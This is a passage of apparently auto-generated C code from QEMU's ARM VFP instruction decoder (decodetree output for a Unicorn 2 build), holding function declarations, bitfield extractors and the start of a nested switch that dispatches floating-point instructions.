*ctx, arg_VMSR_VMRS *a); typedef arg_disas_vfp6 arg_VMOV_single; static bool trans_VMOV_single(DisasContext *ctx, arg_VMOV_single *a); typedef arg_disas_vfp7 arg_VMOV_64_sp; static bool trans_VMOV_64_sp(DisasContext *ctx, arg_VMOV_64_sp *a); typedef arg_disas_vfp7 arg_VMOV_64_dp; static bool trans_VMOV_64_dp(DisasContext *ctx, arg_VMOV_64_dp *a); typedef arg_disas_vfp8 arg_VLDR_VSTR_sp; static bool trans_VLDR_VSTR_sp(DisasContext *ctx, arg_VLDR_VSTR_sp *a); typedef arg_disas_vfp8 arg_VLDR_VSTR_dp; static bool trans_VLDR_VSTR_dp(DisasContext *ctx, arg_VLDR_VSTR_dp *a); typedef arg_disas_vfp9 arg_VLDM_VSTM_sp; static bool trans_VLDM_VSTM_sp(DisasContext *ctx, arg_VLDM_VSTM_sp *a); typedef arg_disas_vfp9 arg_VLDM_VSTM_dp; static bool trans_VLDM_VSTM_dp(DisasContext *ctx, arg_VLDM_VSTM_dp *a); typedef arg_disas_vfp0 arg_VMLA_sp; static bool trans_VMLA_sp(DisasContext *ctx, arg_VMLA_sp *a); typedef arg_disas_vfp0 arg_VMLA_dp; static bool trans_VMLA_dp(DisasContext *ctx, arg_VMLA_dp *a); typedef arg_disas_vfp0 arg_VMLS_sp; static bool trans_VMLS_sp(DisasContext *ctx, arg_VMLS_sp *a); typedef arg_disas_vfp0 arg_VMLS_dp; static bool trans_VMLS_dp(DisasContext *ctx, arg_VMLS_dp *a); typedef arg_disas_vfp0 arg_VNMLS_sp; static bool trans_VNMLS_sp(DisasContext *ctx, arg_VNMLS_sp *a); typedef arg_disas_vfp0 arg_VNMLS_dp; static bool trans_VNMLS_dp(DisasContext *ctx, arg_VNMLS_dp *a); typedef arg_disas_vfp0 arg_VNMLA_sp; static bool trans_VNMLA_sp(DisasContext *ctx, arg_VNMLA_sp *a); typedef arg_disas_vfp0 arg_VNMLA_dp; static bool trans_VNMLA_dp(DisasContext *ctx, arg_VNMLA_dp *a); typedef arg_disas_vfp0 arg_VMUL_sp; static bool trans_VMUL_sp(DisasContext *ctx, arg_VMUL_sp *a); typedef arg_disas_vfp0 arg_VMUL_dp; static bool trans_VMUL_dp(DisasContext *ctx, arg_VMUL_dp *a); typedef arg_disas_vfp0 arg_VNMUL_sp; static bool trans_VNMUL_sp(DisasContext *ctx, arg_VNMUL_sp *a); typedef arg_disas_vfp0 arg_VNMUL_dp; static bool trans_VNMUL_dp(DisasContext *ctx, arg_VNMUL_dp *a); typedef arg_disas_vfp0 arg_VADD_sp; static bool 
trans_VADD_sp(DisasContext *ctx, arg_VADD_sp *a); typedef arg_disas_vfp0 arg_VADD_dp; static bool trans_VADD_dp(DisasContext *ctx, arg_VADD_dp *a); typedef arg_disas_vfp0 arg_VSUB_sp; static bool trans_VSUB_sp(DisasContext *ctx, arg_VSUB_sp *a); typedef arg_disas_vfp0 arg_VSUB_dp; static bool trans_VSUB_dp(DisasContext *ctx, arg_VSUB_dp *a); typedef arg_disas_vfp0 arg_VDIV_sp; static bool trans_VDIV_sp(DisasContext *ctx, arg_VDIV_sp *a); typedef arg_disas_vfp0 arg_VDIV_dp; static bool trans_VDIV_dp(DisasContext *ctx, arg_VDIV_dp *a); typedef arg_disas_vfp0 arg_VFMA_sp; static bool trans_VFMA_sp(DisasContext *ctx, arg_VFMA_sp *a); typedef arg_disas_vfp0 arg_VFMS_sp; static bool trans_VFMS_sp(DisasContext *ctx, arg_VFMS_sp *a); typedef arg_disas_vfp0 arg_VFNMA_sp; static bool trans_VFNMA_sp(DisasContext *ctx, arg_VFNMA_sp *a); typedef arg_disas_vfp0 arg_VFNMS_sp; static bool trans_VFNMS_sp(DisasContext *ctx, arg_VFNMS_sp *a); typedef arg_disas_vfp0 arg_VFMA_dp; static bool trans_VFMA_dp(DisasContext *ctx, arg_VFMA_dp *a); typedef arg_disas_vfp0 arg_VFMS_dp; static bool trans_VFMS_dp(DisasContext *ctx, arg_VFMS_dp *a); typedef arg_disas_vfp0 arg_VFNMA_dp; static bool trans_VFNMA_dp(DisasContext *ctx, arg_VFNMA_dp *a); typedef arg_disas_vfp0 arg_VFNMS_dp; static bool trans_VFNMS_dp(DisasContext *ctx, arg_VFNMS_dp *a); typedef arg_disas_vfp10 arg_VMOV_imm_sp; static bool trans_VMOV_imm_sp(DisasContext *ctx, arg_VMOV_imm_sp *a); typedef arg_disas_vfp10 arg_VMOV_imm_dp; static bool trans_VMOV_imm_dp(DisasContext *ctx, arg_VMOV_imm_dp *a); typedef arg_disas_vfp1 arg_VMOV_reg_sp; static bool trans_VMOV_reg_sp(DisasContext *ctx, arg_VMOV_reg_sp *a); typedef arg_disas_vfp1 arg_VMOV_reg_dp; static bool trans_VMOV_reg_dp(DisasContext *ctx, arg_VMOV_reg_dp *a); typedef arg_disas_vfp1 arg_VABS_sp; static bool trans_VABS_sp(DisasContext *ctx, arg_VABS_sp *a); typedef arg_disas_vfp1 arg_VABS_dp; static bool trans_VABS_dp(DisasContext *ctx, arg_VABS_dp *a); typedef arg_disas_vfp1 arg_VNEG_sp; static bool trans_VNEG_sp(DisasContext *ctx, arg_VNEG_sp *a); typedef arg_disas_vfp1 arg_VNEG_dp; static bool trans_VNEG_dp(DisasContext *ctx, arg_VNEG_dp *a); typedef arg_disas_vfp1 arg_VSQRT_sp; static bool trans_VSQRT_sp(DisasContext *ctx, arg_VSQRT_sp *a); typedef arg_disas_vfp1 arg_VSQRT_dp; static bool trans_VSQRT_dp(DisasContext *ctx, arg_VSQRT_dp *a); typedef arg_disas_vfp11 arg_VCMP_sp; static bool trans_VCMP_sp(DisasContext *ctx, arg_VCMP_sp *a); typedef arg_disas_vfp11 arg_VCMP_dp; static bool trans_VCMP_dp(DisasContext *ctx, arg_VCMP_dp *a); typedef arg_disas_vfp12 arg_VCVT_f32_f16; static bool trans_VCVT_f32_f16(DisasContext *ctx, arg_VCVT_f32_f16 *a); typedef arg_disas_vfp12 arg_VCVT_f64_f16; static bool trans_VCVT_f64_f16(DisasContext *ctx, arg_VCVT_f64_f16 *a); typedef arg_disas_vfp12 arg_VCVT_f16_f32; static bool trans_VCVT_f16_f32(DisasContext *ctx, arg_VCVT_f16_f32 *a); typedef arg_disas_vfp12 arg_VCVT_f16_f64; static bool trans_VCVT_f16_f64(DisasContext *ctx, arg_VCVT_f16_f64 *a); typedef arg_disas_vfp1 arg_VRINTR_sp; static bool trans_VRINTR_sp(DisasContext *ctx, arg_VRINTR_sp *a); typedef arg_disas_vfp1 arg_VRINTR_dp; static bool trans_VRINTR_dp(DisasContext *ctx, arg_VRINTR_dp *a); typedef arg_disas_vfp1 arg_VRINTZ_sp; static bool trans_VRINTZ_sp(DisasContext *ctx, arg_VRINTZ_sp *a); typedef arg_disas_vfp1 arg_VRINTZ_dp; static bool trans_VRINTZ_dp(DisasContext *ctx, arg_VRINTZ_dp *a); typedef arg_disas_vfp1 arg_VRINTX_sp; static bool trans_VRINTX_sp(DisasContext *ctx, arg_VRINTX_sp *a); typedef 
arg_disas_vfp1 arg_VRINTX_dp; static bool trans_VRINTX_dp(DisasContext *ctx, arg_VRINTX_dp *a); typedef arg_disas_vfp1 arg_VCVT_sp; static bool trans_VCVT_sp(DisasContext *ctx, arg_VCVT_sp *a); typedef arg_disas_vfp1 arg_VCVT_dp; static bool trans_VCVT_dp(DisasContext *ctx, arg_VCVT_dp *a); typedef arg_disas_vfp13 arg_VCVT_int_sp; static bool trans_VCVT_int_sp(DisasContext *ctx, arg_VCVT_int_sp *a); typedef arg_disas_vfp13 arg_VCVT_int_dp; static bool trans_VCVT_int_dp(DisasContext *ctx, arg_VCVT_int_dp *a); typedef arg_disas_vfp1 arg_VJCVT; static bool trans_VJCVT(DisasContext *ctx, arg_VJCVT *a); typedef arg_disas_vfp14 arg_VCVT_fix_sp; static bool trans_VCVT_fix_sp(DisasContext *ctx, arg_VCVT_fix_sp *a); typedef arg_disas_vfp14 arg_VCVT_fix_dp; static bool trans_VCVT_fix_dp(DisasContext *ctx, arg_VCVT_fix_dp *a); typedef arg_disas_vfp15 arg_VCVT_sp_int; static bool trans_VCVT_sp_int(DisasContext *ctx, arg_VCVT_sp_int *a); typedef arg_disas_vfp15 arg_VCVT_dp_int; static bool trans_VCVT_dp_int(DisasContext *ctx, arg_VCVT_dp_int *a); typedef arg_disas_vfp16 arg_VLLDM_VLSTM; static bool trans_VLLDM_VLSTM(DisasContext *ctx, arg_VLLDM_VLSTM *a); static void disas_vfp_extract_disas_vfp_Fmt_10(DisasContext *ctx, arg_disas_vfp3 *a, uint32_t insn) { a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 1; a->index = deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 21, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_11(DisasContext *ctx, arg_disas_vfp3 *a, uint32_t insn) { a->index = extract32(insn, 21, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 2; } static void disas_vfp_extract_disas_vfp_Fmt_12(DisasContext *ctx, arg_disas_vfp4 *a, uint32_t insn) { a->b = extract32(insn, 22, 1); a->q = extract32(insn, 21, 1); a->rt = extract32(insn, 12, 4); a->e = extract32(insn, 5, 1); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_13(DisasContext *ctx, arg_disas_vfp5 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->reg = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); } static void disas_vfp_extract_disas_vfp_Fmt_14(DisasContext *ctx, arg_disas_vfp6 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_15(DisasContext *ctx, arg_disas_vfp7 *a, uint32_t insn) { a->op = extract32(insn, 20, 1); a->rt2 = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_16(DisasContext *ctx, arg_disas_vfp7 *a, uint32_t insn) { a->op = extract32(insn, 20, 1); a->rt2 = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_17(DisasContext *ctx, arg_disas_vfp8 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_18(DisasContext *ctx, arg_disas_vfp8 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = 
deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_19(DisasContext *ctx, arg_disas_vfp9 *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->p = 0; a->u = 1; } static void disas_vfp_extract_disas_vfp_Fmt_20(DisasContext *ctx, arg_disas_vfp9 *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->p = 0; a->u = 1; } static void disas_vfp_extract_disas_vfp_Fmt_21(DisasContext *ctx, arg_disas_vfp9 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->p = 1; a->u = 0; a->w = 1; } static void disas_vfp_extract_disas_vfp_Fmt_22(DisasContext *ctx, arg_disas_vfp9 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->p = 1; a->u = 0; a->w = 1; } static void disas_vfp_extract_disas_vfp_Fmt_23(DisasContext *ctx, arg_disas_vfp10 *a, uint32_t insn) { a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 16, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_24(DisasContext *ctx, arg_disas_vfp10 *a, uint32_t insn) { a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 16, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_25(DisasContext *ctx, arg_disas_vfp11 *a, uint32_t insn) { a->z = extract32(insn, 16, 1); a->e = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_26(DisasContext *ctx, arg_disas_vfp11 *a, uint32_t insn) { a->z = extract32(insn, 16, 1); a->e = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_27(DisasContext *ctx, arg_disas_vfp12 *a, uint32_t insn) { a->t = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_28(DisasContext *ctx, arg_disas_vfp12 *a, uint32_t insn) { a->t = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_29(DisasContext *ctx, arg_disas_vfp12 *a, uint32_t insn) { a->t = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_30(DisasContext *ctx, arg_disas_vfp13 *a, uint32_t insn) { a->s = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, 
extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_31(DisasContext *ctx, arg_disas_vfp13 *a, uint32_t insn) { a->s = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_32(DisasContext *ctx, arg_disas_vfp14 *a, uint32_t insn) { a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->imm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->opc = deposit32(deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 1)), 2, 30, extract32(insn, 18, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_33(DisasContext *ctx, arg_disas_vfp14 *a, uint32_t insn) { a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->imm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->opc = deposit32(deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 1)), 2, 30, extract32(insn, 18, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_34(DisasContext *ctx, arg_disas_vfp15 *a, uint32_t insn) { a->s = extract32(insn, 16, 1); a->rz = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_35(DisasContext *ctx, arg_disas_vfp15 *a, uint32_t insn) { a->s = extract32(insn, 16, 1); a->rz = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_36(DisasContext *ctx, arg_disas_vfp16 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); } static void disas_vfp_extract_disas_vfp_Fmt_6(DisasContext *ctx, arg_disas_vfp2 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 0; a->index = deposit32(extract32(insn, 5, 2), 2, 30, extract32(insn, 21, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_7(DisasContext *ctx, arg_disas_vfp2 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 1; a->index = deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 21, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_8(DisasContext *ctx, arg_disas_vfp2 *a, uint32_t insn) { a->index = extract32(insn, 21, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 2; a->u = 0; } static void disas_vfp_extract_disas_vfp_Fmt_9(DisasContext *ctx, arg_disas_vfp3 *a, uint32_t insn) { a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 0; a->index = deposit32(extract32(insn, 5, 2), 2, 30, extract32(insn, 21, 1)); } static void disas_vfp_extract_vfp_dm_dd(DisasContext *ctx, arg_disas_vfp1 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_extract_vfp_dm_ds(DisasContext *ctx, arg_disas_vfp1 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void 
disas_vfp_extract_vfp_dm_sd(DisasContext *ctx, arg_disas_vfp1 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static void disas_vfp_extract_vfp_dm_ss(DisasContext *ctx, arg_disas_vfp1 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static void disas_vfp_extract_vfp_dnm_d(DisasContext *ctx, arg_disas_vfp0 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_extract_vfp_dnm_s(DisasContext *ctx, arg_disas_vfp0 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vn = deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static bool disas_vfp(DisasContext *ctx, uint32_t insn) { union { arg_disas_vfp0 f_disas_vfp0; arg_disas_vfp1 f_disas_vfp1; arg_disas_vfp10 f_disas_vfp10; arg_disas_vfp11 f_disas_vfp11; arg_disas_vfp12 f_disas_vfp12; arg_disas_vfp13 f_disas_vfp13; arg_disas_vfp14 f_disas_vfp14; arg_disas_vfp15 f_disas_vfp15; arg_disas_vfp16 f_disas_vfp16; arg_disas_vfp2 f_disas_vfp2; arg_disas_vfp3 f_disas_vfp3; arg_disas_vfp4 f_disas_vfp4; arg_disas_vfp5 f_disas_vfp5; arg_disas_vfp6 f_disas_vfp6; arg_disas_vfp7 f_disas_vfp7; arg_disas_vfp8 f_disas_vfp8; arg_disas_vfp9 f_disas_vfp9; } u; switch (insn & 0x0f000f00) { case 0x0c000a00: /* ....1100 ........ ....1010 ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....1100 0....... ....1010 ........ */ switch (insn & 0x006000d0) { case 0x00200000: /* ....1100 001..... ....1010 00.0.... */ disas_vfp_extract_disas_vfp_Fmt_36(ctx, &u.f_disas_vfp16, insn); switch (insn & 0xf000f02f) { case 0xe0000000: /* 11101100 001..... 00001010 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:217 */ if (trans_VLLDM_VLSTM(ctx, &u.f_disas_vfp16)) return true; return false; } return false; case 0x00400010: /* ....1100 010..... ....1010 00.1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:79 */ disas_vfp_extract_disas_vfp_Fmt_15(ctx, &u.f_disas_vfp7, insn); if (trans_VMOV_64_sp(ctx, &u.f_disas_vfp7)) return true; return false; } return false; case 0x1: /* ....1100 1....... ....1010 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:95 */ disas_vfp_extract_disas_vfp_Fmt_19(ctx, &u.f_disas_vfp9, insn); if (trans_VLDM_VSTM_sp(ctx, &u.f_disas_vfp9)) return true; return false; } return false; case 0x0c000b00: /* ....1100 ........ ....1011 ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....1100 0....... ....1011 ........ */ disas_vfp_extract_disas_vfp_Fmt_16(ctx, &u.f_disas_vfp7, insn); switch (insn & 0x006000d0) { case 0x00400010: /* ....1100 010..... ....1011 00.1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:80 */ if (trans_VMOV_64_dp(ctx, &u.f_disas_vfp7)) return true; return false; } return false; case 0x1: /* ....1100 1....... ....1011 ........ 
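(bit 23 set selects the increment-after form of VLDM/VSTM; the Fmt_20 extractor below hard-codes p=0, u=1 to match)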
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:97 */ disas_vfp_extract_disas_vfp_Fmt_20(ctx, &u.f_disas_vfp9, insn); if (trans_VLDM_VSTM_dp(ctx, &u.f_disas_vfp9)) return true; return false; } return false; case 0x0d000a00: /* ....1101 ........ ....1010 ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....1101 ..0..... ....1010 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:84 */ disas_vfp_extract_disas_vfp_Fmt_17(ctx, &u.f_disas_vfp8, insn); if (trans_VLDR_VSTR_sp(ctx, &u.f_disas_vfp8)) return true; return false; case 0x1: /* ....1101 ..1..... ....1010 ........ */ disas_vfp_extract_disas_vfp_Fmt_21(ctx, &u.f_disas_vfp9, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....1101 0.1..... ....1010 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:100 */ if (trans_VLDM_VSTM_sp(ctx, &u.f_disas_vfp9)) return true; return false; } return false; } return false; case 0x0d000b00: /* ....1101 ........ ....1011 ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....1101 ..0..... ....1011 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:85 */ disas_vfp_extract_disas_vfp_Fmt_18(ctx, &u.f_disas_vfp8, insn); if (trans_VLDR_VSTR_dp(ctx, &u.f_disas_vfp8)) return true; return false; case 0x1: /* ....1101 ..1..... ....1011 ........ */ disas_vfp_extract_disas_vfp_Fmt_22(ctx, &u.f_disas_vfp9, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....1101 0.1..... ....1011 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:102 */ if (trans_VLDM_VSTM_dp(ctx, &u.f_disas_vfp9)) return true; return false; } return false; } return false; case 0x0e000a00: /* ....1110 ........ ....1010 ........ */ switch (insn & 0x00a00050) { case 0x00000000: /* ....1110 0.0..... ....1010 .0.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 0.00.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:106 */ if (trans_VMLA_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 0.01.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:112 */ if (trans_VNMLS_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00000010: /* ....1110 0.0..... ....1010 .0.1.... */ disas_vfp_extract_disas_vfp_Fmt_14(ctx, &u.f_disas_vfp6, insn); switch (insn & 0x0040002f) { case 0x00000000: /* ....1110 000..... ....1010 .0010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:77 */ if (trans_VMOV_single(ctx, &u.f_disas_vfp6)) return true; return false; } return false; case 0x00000040: /* ....1110 0.0..... ....1010 .1.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 0.00.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:109 */ if (trans_VMLS_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 0.01.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:115 */ if (trans_VNMLA_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00200000: /* ....1110 0.1..... ....1010 .0.0.... 
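(bit 20 then splits this group: clear gives VMUL_sp, set gives VADD_sp)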
*/ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 0.10.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:118 */ if (trans_VMUL_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 0.11.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:124 */ if (trans_VADD_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00200040: /* ....1110 0.1..... ....1010 .1.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 0.10.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:121 */ if (trans_VNMUL_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 0.11.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:127 */ if (trans_VSUB_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00800000: /* ....1110 1.0..... ....1010 .0.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 1.00.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:130 */ if (trans_VDIV_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 1.01.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:135 */ if (trans_VFNMA_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00800040: /* ....1110 1.0..... ....1010 